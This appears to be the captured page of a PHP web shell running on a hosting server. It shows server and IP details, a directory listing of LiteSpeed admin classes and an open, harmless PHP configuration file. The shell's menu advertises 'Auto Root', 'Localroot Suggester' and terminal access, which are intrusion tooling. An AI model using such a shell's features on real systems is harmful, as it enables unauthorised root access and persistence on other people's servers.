Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
html.6.0.9 /
classes /
Delete
Unzip
Name
Size
Permission
Date
Action
ws
[ DIR ]
drwxr-xr-x
2021-10-03 03:02
CHART.php
3.16
KB
-rw-r--r--
2021-10-03 03:02
CValidation.php
27.09
KB
-rw-r--r--
2021-10-03 03:02
ConfData.php
853
B
-rw-r--r--
2021-10-03 03:02
ConfigFile.php
13.96
KB
-rw-r--r--
2021-10-03 03:02
ConfigFileEx.php
4.96
KB
-rw-r--r--
2021-10-03 03:02
CustStatusCode.php
2.22
KB
-rw-r--r--
2021-10-03 03:02
DATTR_HELP.php
767
B
-rw-r--r--
2021-10-03 03:02
DATTR_HELP_ITEM.php
2.53
KB
-rw-r--r--
2021-10-03 03:02
DAttrBase.php
13.19
KB
-rw-r--r--
2021-10-03 03:02
DFileSect.php
582
B
-rw-r--r--
2021-10-03 03:02
DPage.php
3.72
KB
-rw-r--r--
2021-10-03 03:02
DTbl.php
16.7
KB
-rw-r--r--
2021-10-03 03:02
DUtil.php
4.71
KB
-rw-r--r--
2021-10-03 03:02
DispInfo.php
4.3
KB
-rw-r--r--
2021-10-03 03:02
GUIBase.php
3.25
KB
-rw-r--r--
2021-10-03 03:02
PathTool.php
3.28
KB
-rw-r--r--
2021-10-03 03:02
XmlTreeBuilder.php
3.37
KB
-rw-r--r--
2021-10-03 03:02
blowfish.php
26.82
KB
-rw-r--r--
2021-10-03 03:02
jCryption.php
15.73
KB
-rw-r--r--
2021-10-03 03:02
Save
Rename
<?php class CVal { private $_v = NULL; //value private $_e = NULL; //err public function __construct($v, $e=NULL) { $this->_v = $v; $this->_e = $e; } public function GetVal() { return $this->_v; } public function SetVal($v) { $this->_v = $v; } public function HasVal() { // 0 is valid return ($this->_v !== NULL && $this->_v !== ''); } public function GetErr() { return $this->_e; } public function SetErr($e) { $this->_e = $e; } public function HasErr() { return $this->_e != NULL; } } class ConfData { var $_data; var $_path; var $_type; //{'serv','admin','vh','tp'} var $_id; public function __construct($type, $path, $id=NULL) { $this->_data = array(); $this->_type = $type; $this->_path = $path; $this->_id = $id; } public function setId($id) { $this->_id = $id; } }